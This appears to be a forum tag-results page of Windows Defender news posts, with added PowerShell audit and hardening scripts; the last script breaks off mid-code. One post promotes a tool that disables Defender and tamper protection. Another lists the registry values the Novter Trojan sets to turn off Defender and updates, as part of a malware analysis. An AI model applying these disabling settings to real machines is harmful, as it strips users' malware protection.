Showing results for tags 'windows defender'.
Found 19 results

  1. Windows Defender: Vulnerable Driver Blocklist protects against malicious or exploitable drivers

Vulnerable Driver Blocklist is a new security feature of Windows Defender on Windows 10, Windows 11 and Windows Server 2016 or newer devices that protects against malicious or exploitable drivers.

Announced by Microsoft's Vice President of Enterprise and OS Security, David Weston, on Twitter, the Microsoft Vulnerable Driver Blocklist is a new security feature that is enabled by default on Windows 10 in S mode devices and on devices that have the Core Isolation feature Memory Integrity, which Microsoft may also refer to as Hypervisor-protected code integrity (HVCI), enabled. Memory Integrity, or HVCI, makes use of Microsoft's Hyper-V technology to protect Windows kernel-mode processes against malicious code injection. The feature was not enabled on existing devices when it first shipped, but it appears to be enabled by default on devices with new installations of Windows. Some users reported issues with certain devices with HVCI enabled, and that disabling it resolved the issues that they experienced.

The core idea behind the new protective feature is to maintain a list of drivers that will be blocked by Windows Defender because the drivers have at least one of the following attributes:
    • Known security vulnerabilities that can be exploited by attackers to elevate privileges in the Windows kernel
    • Malicious behaviors (malware) or certificates used to sign malware
    • Behaviors that are not malicious but circumvent the Windows Security Model and can be exploited by attackers to elevate privileges in the Windows kernel

Microsoft cooperates with hardware vendors and OEMs to maintain the blocklist. Suspected drivers may be submitted to Microsoft for analysis, and manufacturers may request that changes are made to drivers that are on the vulnerable blocklist, e.g. after patching an issue. Devices that run Windows 10 in S mode and devices with HVCI enabled protect against these security threats once the feature is rolled out to devices.

Windows users and administrators may enable the Memory Integrity prerequisite in the following way on non-Windows 10 S mode devices:
    1. Select Start and then Settings, or use the keyboard shortcut Windows-I to open the Settings application.
    2. On Windows 10, go to Update & Security > Windows Security and select Open Windows Security. On Windows 11, go to Privacy & Security > Windows Security and select Open Windows Security.
    3. Select Device Security from the sidebar on the left side.
    4. Activate the "Core isolation details" link.
    5. Toggle the Memory Integrity setting to On to enable the feature.
    6. Restart the device.

Windows administrators will see the new Microsoft Vulnerable Driver Blocklist on the Core isolation page of Windows Security once the feature becomes available. The feature can be toggled on or off, and also managed through other means. David Weston notes that turning it on will enable a more aggressive blocklist. Microsoft states that it recommends enabling HVCI or using S mode, but that administrators may also block the drivers on the list using an existing Windows Defender Application Control policy. The documentation lists an XML file that contains the blocked drivers ready for use.

Now You: is Memory Integrity enabled on your devices, if you use Windows Defender?
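The Settings walk-through above has a scriptable equivalent. The following is an added example written for this page, not code from the article or from Microsoft: it reads the Device Guard status that the Core isolation page is built on, reports whether HVCI is merely configured or actually running, reads the blocklist toggle Microsoft documents for devices without HVCI (VulnerableDriverBlocklistEnable under HKLM\SYSTEM\CurrentControlSet\Control\CI\Config), and optionally enables HVCI through its registry scenario key. The $EnableHvci switch and the output layout are the example's own choices.

```powershell
# Added example for this page (not from the article or Microsoft). Run elevated.
# Reports Memory Integrity (HVCI) and Vulnerable Driver Blocklist state and can
# turn HVCI on; a reboot is needed before the change takes effect.

# Win32_DeviceGuard distinguishes "configured" from "actually running".
# Service IDs in the SecurityServices* arrays: 1 = Credential Guard, 2 = HVCI.
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard

$hvciConfigured = [bool]($dg.SecurityServicesConfigured -contains 2)
$hvciRunning    = [bool]($dg.SecurityServicesRunning    -contains 2)
$vbsState       = switch ($dg.VirtualizationBasedSecurityStatus) {
    0 { 'off' } 1 { 'configured, not running' } 2 { 'running' } default { "unknown ($_)" }
}

# Blocklist toggle Microsoft documents for devices without HVCI or S mode.
$ciKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\CI\Config'
$blocklist = (Get-ItemProperty -Path $ciKey -Name VulnerableDriverBlocklistEnable -ErrorAction SilentlyContinue).VulnerableDriverBlocklistEnable
if ($null -eq $blocklist) { $blocklist = 'not set (platform default)' }

[pscustomobject]@{
    VBS                       = $vbsState
    HVCIConfigured            = $hvciConfigured
    HVCIRunning               = $hvciRunning
    VulnerableDriverBlocklist = $blocklist
} | Format-List

# Opt-in: the same registry value the Settings toggle writes. Set $EnableHvci = $true to apply.
$EnableHvci = $false
if ($EnableHvci -and -not $hvciConfigured) {
    $hvciKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity'
    New-Item -Path $hvciKey -Force | Out-Null
    Set-ItemProperty -Path $hvciKey -Name Enabled -Value 1 -Type DWord
    Write-Host 'HVCI configured. Reboot, then re-run this script and confirm HVCIRunning = True.'
}
```

"Configured" and "running" differ on purpose: a device can have the toggle set but fall back to running without HVCI when a driver or the hypervisor fails to load, which is exactly the case the post's "disabling it resolved the issues" reports describe. Check HVCIRunning, not just the registry, before assuming the blocklist is enforced.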
  2. Display all threats that Windows Defender detected with WinDefLogView

WinDefLogView is a new portable application by Nirsoft. The program displays information about recent threats that the default Windows security solution detected. While it is possible to check detected threats elsewhere, doing so requires quite a few clicks in the Windows Security app. The way results are displayed is also not ideal for getting a quick overview of recent threats.

WinDefLogView is a typical Nirsoft application. It is small in size and portable. Just download the archive from the Nirsoft website, extract it on the system, and run the executable file to launch the app. The program is compatible with Microsoft's Windows 10 and 11 operating systems only, but it may be run on older versions of Windows, e.g. Windows 7, to display information from remote systems running Windows 10 or 11.

The interface displays all detected threats in a table. Each line lists the filename, detection name, threat name, severity, category, action, origin, process name and more. A click on a column header sorts the listing accordingly, e.g. by date or severity. The shortcut Ctrl-F or the selection of Edit > Find displays a search option to filter based on input; this is useful if lots of threats are displayed. The selection of File > Choose data source enables you to retrieve the data from remote computer systems or external folders.

The right-click menu displays several options. The most interesting opens the threat URL on Microsoft's website, which offers additional information on the detected threat. WinDefLogView is a threat viewer, which means that it does not offer any options to react to the threats it displays. Some or all lines can be exported to the local system in several formats, including CSV, JSON and XML. Items can also be copied directly using Ctrl-C. The copied items can then be pasted into spreadsheet applications such as Excel.

Description on Nirsoft's website:

    WinDefLogView is a tool for Windows 10 and Windows 11 that reads the event log of Windows Defender (Microsoft-Windows-Windows Defender/Operational) and displays a log of threats detected by Windows Defender on your system. For every log line, the following information is displayed: Filename, Detect Time, Threat Name, Severity, Category, Detection User, Action, Origin, and more... You can view the detected threats log on your local computer, on remote computers on your network, and on an external disk plugged into your computer.

Closing Words

WinDefLogView is a useful application, as it provides a quick view of all detected Windows Defender threats. While it does not support threat actions, it may point users in the right direction immediately without having to use the cumbersome Windows Security application.

Now You: do you use Windows Defender?
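The tool reads the Microsoft-Windows-Windows Defender/Operational log, which is also reachable without a GUI. The following added example (written for this page, not Nirsoft's code) pulls the same detection events with Get-WinEvent, flattens the EventData fields the tool shows into objects, and exports them to CSV. Event 1116 is "malware detected" and 1117 is "action taken"; the 30-day window, the -ComputerName default and the output path are the example's own assumptions.

```powershell
# Added example for this page (not Nirsoft's code): read Defender detections
# from the same event log WinDefLogView uses. Works against a remote host with
# -ComputerName if you have remote event log rights.
param(
    [string]$ComputerName = $env:COMPUTERNAME,   # assumption: local machine by default
    [int]$Days = 30                               # assumption: look back 30 days
)

$filter = @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 1116, 1117                        # 1116 = detected, 1117 = action taken
    StartTime = (Get-Date).AddDays(-$Days)
}
$events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue

# The named EventData fields are easier to read from the XML view than from Message.
function ConvertTo-DetectionRecord {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $xml  = [xml]$Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        Time       = $Event.TimeCreated
        EventId    = $Event.Id
        ThreatName = $data['Threat Name']
        Severity   = $data['Severity Name']
        Category   = $data['Category Name']
        Path       = $data['Path']
        Process    = $data['Process Name']
        User       = $data['Detection User']
        Action     = $data['Action Name']
        Origin     = $data['Origin Name']
        InfoUrl    = $data['FWLink']              # the "threat URL" the right-click menu opens
    }
}

$records = $events | ForEach-Object { ConvertTo-DetectionRecord $_ }
$records | Sort-Object Time -Descending | Format-Table Time, EventId, ThreatName, Severity, Path, Process -AutoSize

# Export like the tool's File > Save; CSV feeds a spreadsheet or SIEM import.
$records | Export-Csv -Path "$env:TEMP\defender-detections.csv" -NoTypeInformation
```

Pairing 1116 with the matching 1117 tells you whether a detection was actually remediated; a 1116 with no 1117 for the same path is the case worth chasing.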
  3. Windows Defender for home users fails to win any of AV-TEST's best anti-virus 2021 awards

In its rankings for 2021, anti-virus assessment firm AV-Comparatives wasn't super-impressed by Windows Defender, at least when compared to some of its rival products. However, AV-TEST had a somewhat different opinion, as its report showed Microsoft Defender doing exceptionally well in the second half of the year, scoring full marks in both the October 2021 test and the December 2021 assessment.

But, despite the great showing, Microsoft and fans of the Defender antivirus solution may be somewhat disappointed, as the consumer version of the product failed to win any of the awards that AV-TEST conferred on the products it felt were the best anti-virus solutions of 2021. For Windows, three awards were given for three different categories:
    • Best Protection
    • Best Performance
    • Best Usability

As stated above, Defender failed to secure any of the categories for its consumer product. In case you are wondering who the winners are, they are listed below under the categories they won in.

    Best Protection: Bitdefender, Kaspersky, Norton 360
    Best Performance: ESET, G DATA, Kaspersky, Norton 360, PC Matic, Protected.net, Total AV
    Best Usability: Avira, ESET

Not all is bad for Microsoft though, as Defender managed to snag a win in the Best Protection for Corporate Users category. You can view the full report here.
  4. qtkite's Defender Control is a portable app capable of turning off Windows Defender without the need to install an antivirus. This little app makes it simple to turn off Windows Defender without jumping through hoops. Of course, you should always have an up-to-date antivirus solution on your machine. But there are times when you need to turn it off, like when using certain software, for instance. qtkite's Defender Control makes it quick and efficient. The same simplicity applies to enabling protection; run enable.exe and it will be active again.

qtkite's Defender Control gains TrustedInstaller permissions and will disable the Windows Defender services & SmartScreen. It also disables anti-tamper protection and all relevant registry + WMI settings.

Writeup: If you are interested in how I developed this program, check out the writeup here.

Changelog:
    Defender Control v1.3 - Latest - Jan 25, 2022
        Manages the Security Center service now.
    Defender Control v1.2 - Oct 14, 2021
        Statically linked runtime libraries to binaries.

Home: https://github.com/qtkite/defender-control
Changelog / Download Page: https://github.com/qtkite/defender-control/releases

Downloads - v1.3:
    disable-defender.exe 294 KB
    enable-defender.exe 293 KB
    Source code (zip)
    Source code (tar.gz)
  5. Microsoft fixes Windows Defender flaw which would execute instead of deleting malware

Microsoft has fixed a flaw in Windows Defender which was being actively exploited in the wild. The Microsoft Defender Remote Code Execution Vulnerability (CVE-2021-1647) would see Windows Defender turn into the attacker, triggering the execution of malware when the malware was scanned, instead of quarantining and deleting it. This means a file could be sent by email or USB drive, and when downloaded and automatically scanned, be immediately triggered.

The exploit was fixed as part of Patch Tuesday on the 12th and was one of 80 flaws which were addressed.

To check if you are protected, check the version number of the scan engine in the Windows Security app by searching for Windows Security in the Start menu, opening the app, and going to Settings and About. Version 1.1.17700.4 and above are not vulnerable to the exploit.

via GrahamCluley
  6. Turn on Mandatory ASLR in Windows Security

I've been using it for quite a while now; it caused no problems or errors with any legitimate programs, games, anti-cheat systems etc., other than with some "custom" made portable programs. It's off by default; when you turn it on, you will have to restart your device.

Address space layout randomization

    Address space layout randomization (ASLR) is a computer security technique involved in preventing exploitation of memory corruption vulnerabilities. In order to prevent an attacker from reliably jumping to, for example, a particular exploited function in memory, ASLR randomly arranges the address space positions of key data areas of a process, including the base of the executable and the positions of the stack, heap and libraries.

    The Linux PaX project first coined the term "ASLR", and published the first design and implementation of ASLR in July 2001 as a patch for the Linux kernel. It is seen as a complete implementation, providing also a patch for kernel stack randomization since October 2002.[1] The first mainstream operating system to support ASLR by default was OpenBSD version 3.4 in 2003,[2][3] followed by Linux in 2005.

https://en.wikipedia.org/wiki/Address_space_layout_randomization
https://blogs.technet.microsoft.com/srd/2017/11/21/clarifying-the-behavior-of-mandatory-aslr/

Other options that are turned off by default and you should enable to make your Windows device more secure

With the increasing number of threats in cyber security and new ransomware, if you are only relying on Windows 10's built-in security and not using any 3rd party AV such as Kaspersky, you must enable these features to keep yourself secure. Hope everyone stays safe!
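The same switch the post toggles in Windows Security > App & browser control > Exploit protection is exposed by the ProcessMitigations cmdlets, which also give you the per-program opt-out for the kind of "custom" portable program the post says breaks. The following is an added example for this page, not the poster's or Microsoft's code; "legacyapp.exe" is a hypothetical program name and the export path is the example's own.

```powershell
# Added example for this page (not the poster's code). Elevated session required.
# Mandatory ASLR = ForceRelocateImages; BottomUp randomization is what gives it teeth
# (see the "Clarifying the behavior of mandatory ASLR" post linked above).

# 1. Record the current system-wide defaults before changing anything.
$before = Get-ProcessMitigation -System
$before.ASLR | Format-List ForceRelocateImages, BottomUp, HighEntropy

# 2. Turn Mandatory ASLR on system-wide, together with bottom-up randomization.
Set-ProcessMitigation -System -Enable ForceRelocateImages, BottomUp

# 3. Per-program opt-out for a program that breaks under forced relocation.
#    Hypothetical image name; the cmdlet keys on the executable name, not a path.
Set-ProcessMitigation -Name 'legacyapp.exe' -Disable ForceRelocateImages

# 4. Verify, and export the whole policy as XML for the change record
#    (the same format Windows Security's "Export settings" produces).
(Get-ProcessMitigation -System).ASLR.ForceRelocateImages        # expect ON
(Get-ProcessMitigation -Name 'legacyapp.exe').ASLR.ForceRelocateImages   # expect OFF
Get-ProcessMitigation -RegistryConfigFilePath "$env:TEMP\exploit-protection.xml"

# Roll back if needed:
#   Set-ProcessMitigation -System -Disable ForceRelocateImages, BottomUp
# As the post notes, a restart is needed for the system default to take effect.
```

Keep the opt-out list short and name-specific: a per-program override applies to any executable with that name, so an attacker who can drop a binary called legacyapp.exe inherits the exemption.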
  7. Another key Win10 security feature bites the dust: Say goodbye to Windows Defender Exploit Guard

There's a reason why I'm skeptical about the fancy new security features touted for Win10 versions. In many cases, at least for me, they don't work. Enterprises have a different school of fish to fry, but the benefits of some of the new features just elude me.

Take, if you will, the Windows Defender Exploit Guard. When Win10 version 1709 hit the street, it was billed as a major new security feature that the whole world needs. Although on the surface it seemed like something I could understand — keep rogue programs out of key pieces of Windows — I never got it to work right. Here's how MS described it back during the 1709 release:

    Implementing Attack Surface Reduction rules within Windows Defender Exploit Guard. Exploit Guard is a new feature of v1709 that helps prevent a variety of actions often used by malware. You can read more about Exploit Guard here: Reduce attack surfaces with Windows Defender Exploit Guard. Note that we have enabled "block" mode for all of these settings. We are continuing to watch the "Block office applications from injecting into other process" setting; if it creates compatibility problems then we might change the baseline recommendation to "audit" mode for that setting. Please let us know what you observe.

That seems like a worthy goal, and I dutifully reported on it. But I never got it to work.

Now comes word that Microsoft's recommending everybody disable it in Win10 1909. From the newly published Security Baseline for 1909:

    Exploit Protection
    Because of reported compatibility issues with the Exploit Protection settings that we began incorporating with the Windows 10 v1709 baselines, we have elected to remove the settings from the baseline and to provide a script for removing the settings from machines that have had those settings applied. (See Remove-EPBaselineSettings.ps1 in the download package's Scripts folder.)

So this once-highly-touted security feature has not only bitten the dust, there's a handy program included in the Security Baselines toolbox that makes it easy to ensure that the %$#@! thing has been turned off everywhere.

There's a reason to be skeptical of new security "features" that you don't understand....

Source: Another key Win10 security feature bites the dust: Say goodbye to Windows Defender Exploit Guard (AskWoody - Woody Leonhard)
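The baseline text quoted above names the one Attack Surface Reduction rule Microsoft was unsure about and the "audit" mode it might fall back to. The following is an added example for this page, not the article's or the baseline package's code: it puts that rule into audit mode, confirms the configured state, and counts how often the rule would have fired before anyone switches it to block. The rule GUID is Microsoft's published ID for "Block Office applications from injecting code into other processes"; the seven-day window is the example's own choice.

```powershell
# Added example for this page (not from the article or the Security Baseline).
# Requires an elevated session on Windows 10 1709 or newer.

# Microsoft's rule ID for "Block Office applications from injecting code into other processes".
$rule = '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84'

# Audit first: the rule logs what it would block without blocking anything.
Add-MpPreference -AttackSurfaceReductionRules_Ids $rule -AttackSurfaceReductionRules_Actions AuditMode

# Confirm the configured state. Ids and Actions are parallel arrays; 1 = Block, 2 = Audit.
$pref = Get-MpPreference
for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
    [pscustomobject]@{
        RuleId = $pref.AttackSurfaceReductionRules_Ids[$i]
        Action = $pref.AttackSurfaceReductionRules_Actions[$i]
    }
}

# After a trial period: how often would this rule have fired, and what did it hit?
# Event 1121 = blocked, 1122 = audited, both in the Defender operational log; the
# message text carries the rule ID and the offending process/target.
$hits = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 1121, 1122
    StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue | Where-Object { $_.Message -match $rule }

$hits | Group-Object Id | Select-Object Name, Count
$hits | Select-Object TimeCreated, Message | Format-List

# Only once every audit hit is understood, switch the rule to block:
#   Set-MpPreference -AttackSurfaceReductionRules_Ids $rule -AttackSurfaceReductionRules_Actions Enabled
# Or remove it again:
#   Remove-MpPreference -AttackSurfaceReductionRules_Ids $rule
```

Audit mode is the answer to "I never got it to work": a rule that silently breaks a line-of-business add-in in block mode shows up as a stream of 1122 events in audit mode, with the process name, before any user is affected.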
  8. Nirsoft's latest tool helps you manage Windows Defender Threats in bulk

WinDefThreatsView is a new freeware tool for Microsoft's Windows 10 and 8.1 operating systems by Nirsoft that assists administrators in managing threats detected by the operating system's built-in antivirus protection, Windows Defender Antivirus.

Windows Defender Antivirus is the default antivirus solution on Windows 10. Users may install third-party security software which may take over, but part of the userbase uses the default solution instead. Like many other built-in Windows tools, Windows Defender Antivirus is not particularly well designed when it comes to configuring and managing the application. The program displays a notification when a threat is detected, but the only option to deal with those is on a one-by-one basis. Important management dashboards such as the threat history or various protections are not easily located on the system, and it often takes lots of clicks and knowledge to open these menus.

WinDefThreatsView

WinDefThreatsView provides an alternative, at least when it comes to managing detected threats. The free program is provided as a 32-bit and 64-bit version for Microsoft's Windows 10 and 8.1 operating systems. Just run the program from any location; it is provided as an archive that you need to extract first but does not need to be installed.

The application lists all detected threats in its interface. For new threats, it is necessary to hit the refresh button if the program is running already to have these picked up and listed as well. The program loads local threat data by default, but you can use it to display the threat data of remote computer systems as well. Select Options > Advanced Options to do so. You need to switch to "Load threats data from remote computer" and specify the computer name and username/password if required. Note that you may run the tool on a Windows 7 machine to connect to a supported operating system using the remote computer option.

All threats are listed with the filename, threat name, severity, domain user and process name, time and date of initial detection and remediation, threat ID and status, action, paths, and more. All data or a selection can be saved to various file types including txt, csv, xml and json.

A right-click on a selection displays options to handle all selected threats at once. Select "Set default action for selected threats" to select an action, e.g. quarantine, allow, block or remove, that you want applied to the threat. You may use it to manage all threats or a subset of threats at once, which improves manageability significantly. You may also run the program from the command line, but only to export threats to a new file that you specify.

Closing Words

WinDefThreatsView is a handy portable program for Microsoft Windows administrators who manage systems with Windows Defender Antivirus enabled. Besides the useful option to manage multiple threats at once, it is also capable of exporting threat data to several file formats.

Landing Page: https://www.nirsoft.net/utils/windows_defender_threats_view.html

Source: Nirsoft's latest tool helps you manage Windows Defender Threats in bulk (gHacks - Martin Brinkmann)

[ Software Updates post here... https://www.nsaneforums.com/topic/369016-windefthreatsview-100/ ]
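The "Set default action for selected threats" workflow maps onto the built-in Defender PowerShell module, which is what a fleet script would call instead of a GUI. The following is an added example for this page, not Nirsoft's code: it joins the detection history (Get-MpThreatDetection) to the threat catalogue (Get-MpThreat), picks the threats that are still active at severity High or above, assigns them a default action of Remove with Add-MpPreference, and then lets Remove-MpThreat act on everything active. The severity threshold, the action and the export path are the example's own choices.

```powershell
# Added example for this page (not Nirsoft's code): bulk threat handling with the
# Defender module. Elevated session required for Add-MpPreference / Remove-MpThreat.

$threats    = Get-MpThreat            # one row per threat: ThreatID, ThreatName, SeverityID, IsActive
$detections = Get-MpThreatDetection   # one row per detection: Resources, ProcessName, times, ThreatStatusID

# Index the catalogue by ThreatID so each detection can be enriched with name and severity.
$byId = @{}
foreach ($t in $threats) { $byId["$($t.ThreatID)"] = $t }

$summary = foreach ($d in $detections) {
    $t = $byId["$($d.ThreatID)"]
    [pscustomobject]@{
        ThreatID        = $d.ThreatID
        ThreatName      = $t.ThreatName
        SeverityID      = $t.SeverityID          # 1 Low, 2 Moderate, 4 High, 5 Severe
        IsActive        = $t.IsActive
        Resources       = ($d.Resources -join '; ')
        ProcessName     = $d.ProcessName
        DomainUser      = $d.DomainUser
        InitialDetected = $d.InitialDetectionTime
        Remediated      = $d.RemediationTime
        ThreatStatusID  = $d.ThreatStatusID
    }
}
$summary | Sort-Object InitialDetected -Descending | Format-Table -AutoSize

# Bulk action, the equivalent of "Set default action for selected threats":
# every still-active threat of severity High or above gets a default action of Remove.
$targets = $threats | Where-Object { $_.IsActive -and $_.SeverityID -ge 4 } |
    Select-Object -ExpandProperty ThreatID -Unique
if ($targets) {
    $actions = $targets | ForEach-Object { 'Remove' }    # one action per ID, same order
    Add-MpPreference -ThreatIDDefaultAction_Ids $targets -ThreatIDDefaultAction_Actions $actions
    Remove-MpThreat    # applies the per-threat default actions to all active threats now
}

# Export like the tool's File > Save (CSV here; pipe to ConvertTo-Json for JSON).
$summary | Export-Csv -Path "$env:TEMP\defender-threats.csv" -NoTypeInformation
```

The default-action table is persistent configuration, not a one-off command: an "Allow" set this way keeps allowing that ThreatID on future detections, so review Get-MpPreference's ThreatIDDefaultAction_Ids periodically and remove entries that are no longer wanted.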
  9. Microsoft patches Windows Defender bug with the latest update

Just a couple of days back we covered a bug that caused Windows Defender to skip some items during an antivirus scan. While Microsoft didn't officially acknowledge the issue, the company has issued a new update which fixes the bug. Today, Microsoft has released the KB4052623 update along with Security Intelligence Update for Windows Defender (v4.18.2003.8), which fixes the scanning issue for all Windows 10 users. KB4052623 is currently available for Windows 10 Home, Pro and Enterprise users. Unfortunately, the update comes with a couple of known issues which might affect some users.

Known issues:

New file path
Because of a change in the file path location in the update, many downloads are blocked when AppLocker is enabled. To work around this issue, open Group Policy, and then change the setting to Allow for the following path:
    %OSDrive%\ProgramData\Microsoft\Windows Defender\Platform\*

Secure Boot issue in version 4.18.1901.7
Some devices that are running Windows 10 do not start if they have Secure Boot turned on. We are working on this issue and plan to provide a fix in a future update. To work around this issue in the meantime, follow these steps:
    1. Restart the device, and enter the BIOS.
    2. Turn off Secure Boot, and then restart the device again.
    3. In an administrative Command Prompt window, run the following command:
           "%programdata%\Microsoft\Windows Defender\Platform\4.18.1901-7\MpCmdRun.exe" -revertplatform
    4. Wait for one minute, and then do the following:
           Run sc query windefend to verify that the Windows Defender service is running.
           Run sc qc windefend to verify that the Windows Defender binary no longer points to version 4.18.1901.7.
    5. Restart the device, re-enter the BIOS, and then turn on Secure Boot.

The new update is available through Windows Update and WSUS. Alternatively, users can also download the new update from the Microsoft Update Catalog and install it manually.

Source: Microsoft patches Windows Defender bug with the latest update (MSPoweruser)
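Both the CVE-2021-1647 post above and this one reduce to "is the installed version at or above X": engine 1.1.17700.4 there, platform 4.18.2003.8 here, with 4.18.1901.7 as the build to avoid. The following is an added example for this page, not code from either article: it reads the versions Get-MpComputerStatus reports, compares them as [version] objects (as strings, "1.1.9000.0" would sort after "1.1.17700.4"), and shows which platform binary the WinDefend service is actually running, which is what the "sc qc windefend" step checks. The threshold table is the example's own, built from the numbers in the two posts.

```powershell
# Added example for this page (not from either article): version gate for the
# Defender engine and platform, compared numerically rather than as strings.

$status = Get-MpComputerStatus

$checks = @(
    # Engine: CVE-2021-1647 is fixed from engine 1.1.17700.4 (January 2021 post above).
    @{ Component = 'Engine';   Installed = [version]$status.AMEngineVersion;  Required = [version]'1.1.17700.4' }
    # Platform: 4.18.1901.7 had the Secure Boot start-up issue; this post names 4.18.2003.8.
    @{ Component = 'Platform'; Installed = [version]$status.AMProductVersion; Required = [version]'4.18.2003.8' }
)

$report = foreach ($c in $checks) {
    [pscustomobject]@{
        Component = $c.Component
        Installed = $c.Installed
        Required  = $c.Required
        OK        = ($c.Installed -ge $c.Required)
    }
}
$report | Format-Table -AutoSize

# Which platform folder the service really runs from (equivalent of "sc qc windefend").
# A mismatch with AMProductVersion means a platform update is staged but not yet active.
(Get-CimInstance -ClassName Win32_Service -Filter "Name='WinDefend'").PathName

# Signature (security intelligence) age, the third number worth gating on.
[pscustomobject]@{
    SignatureVersion = $status.AntivirusSignatureVersion
    SignatureAgeDays = $status.AntivirusSignatureAge
}

# If anything is behind: Update-MpSignature pulls the latest signatures without waiting
# for Windows Update; the platform itself ships as KB4052623 through Windows Update/WSUS.
```

Engine, platform and signatures are three independently versioned pieces; a fully patched platform with a stale engine is still exposed to an engine bug like CVE-2021-1647, so gate on each one separately.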
  10. More images of the new Microsoft Defender Preview app leak out

A few days ago, we came to learn about a new Windows Defender Preview app that Microsoft has been working on. It was speculated that the new application might be a new Defender version built specifically for Windows 11. However, that appears not to be the case.

Twitter leakster WalkingCat shared the Microsoft Store link for Windows Defender Preview two days ago on his handle. From the store, we come to know that the new app will run on Windows 10 too, as long as the build is 19041.0 or newer. As such, I fired it up on my Windows 10 PC, but when trying to proceed from the initial Get Started screen (image at top), we are greeted with a message that reads "Your account isn't authorized to use Microsoft Defender yet". This blocks us from proceeding further.

A Twitter user, Ahmed Walid, however was able to use a hack to bypass this block and has posted some screenshots of the user interface of the new Microsoft Defender Preview. The application is still a work in progress, with more features like "Identity" and "Connections" labeled as Coming soon. Below is what the home screen of the new Defender app appears like:

Overall, the new Microsoft Defender Preview seems unfinished still, with some work remaining to be done on it. After that, the application could begin rolling out to Insiders first before being generally available.
  11. Microsoft appears to be working on a new Windows Defender app for Windows 11

Microsoft appears to be readying a new Windows Defender Preview app for Windows 11, according to a tweet by Alumia. The app has the code-name GibraltarApp and appears to be rebuilt using WPF and XAML. It will replace the current inbox app in Windows 11. It is claimed to offer "simple, seamless and personalized protection" to users and is expected to roll out to Windows Insiders in the near future.

via Deskmodder
  12. Novter Trojan Sets its Sights on Microsoft Windows Defender

The Novter Trojan, also known as Nodersok or Divergent, is the latest Trojan to actively target Microsoft's Windows Defender by attempting to disable it.

Last week, three reports came out about a new fileless Trojan that installs Node.JS onto a victim's machine and configures it as a proxy server for click-fraud and other malicious activity. This Trojan is named Nodersok by Microsoft, Divergent by Cisco Talos, and Novter by Trend Micro.

With Windows Defender maturing into a full-fledged AV solution and becoming tightly integrated into the Windows operating system, recent Trojans have been making an effort to disable its real-time protection and other features. This will allow Trojans to download further malware without risk of Defender detecting them, or prevent future definition updates from detecting existing malware.

As previously explained by all three companies, when installed Novter will execute a PowerShell script that disables Windows Defender and modifies Windows Update settings. This is becoming more common, as we have seen TrickBot and Gootkit disable Windows Defender in recent variants.

According to security researcher Vitali Kremez, who also reverse engineered Novter, the malware will add a variety of Windows policies that disable various functionality in Windows Defender.

Novter disabling Windows Defender

The policies that are created are as follows:

    // Disables Windows Defender. 3rd Party security software could be affected
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ "DisableAntiSpyware" = 1

    // Prevents Windows Defender from automatically removing detected items
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ "DisableRoutinelyTakingAction" = 1

    // Disables Windows Defender real-time protection
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\ "DisableRealtimeMonitoring" = 1

    // Enable Automatic Updates: 0
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\ "NoAutoUpdate" = 0

    // 2 = Notify before download. In other words, don't automatically download and install
    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU\ "AUOptions" = 2

    // ScheduledInstallDay, 0 = Every day
    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU\ "ScheduledInstallDay" = 0

    // ScheduledInstallTime, 03:00
    HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU\ "ScheduledInstallTime" = 3

    // Disable peer-to-peer windows updates
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization "DODownloadMode" = 0

Once these policies are created, Windows Defender will be disabled on the machine and new Windows updates will not be installed automatically. This leaves the computer open to vulnerabilities and lacking real-time protection if they are not using a third-party security product.

As Windows Defender continues to grow into a product that stands on its own merits, we will see more malware continue to utilize similar techniques to bypass security such as Windows Defender.

Source: Novter Trojan Sets its Sights on Microsoft Windows Defender
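The policy list above doubles as a detection checklist: each value is a specific registry path and a specific number. The following is an added example for this page, not code from the article or the researchers it cites: it reads the Defender-disabling and update-throttling values from that list on the local host, flags any that match the malware's setting, and cross-checks what Defender itself reports, including whether tamper protection is on. The check table is built only from values listed above; the benign-looking scheduling values are left out.

```powershell
# Added example for this page (not from the article): read-only audit of the
# policy values Novter writes. Run locally, as a scheduled job, or via Invoke-Command.

$checks = @(
    @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';                      Name = 'DisableAntiSpyware';           Bad = 1 }
    @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';                      Name = 'DisableRoutinelyTakingAction'; Bad = 1 }
    @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection'; Name = 'DisableRealtimeMonitoring';    Bad = 1 }
    @{ Key = 'HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\WindowsUpdate\AU';  Name = 'AUOptions';                    Bad = 2 }
    @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization';           Name = 'DODownloadMode';               Bad = 0 }
)

$findings = foreach ($c in $checks) {
    # An absent value reads as $null; $null never equals a number, so absent is "not flagged".
    $v = (Get-ItemProperty -Path $c.Key -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
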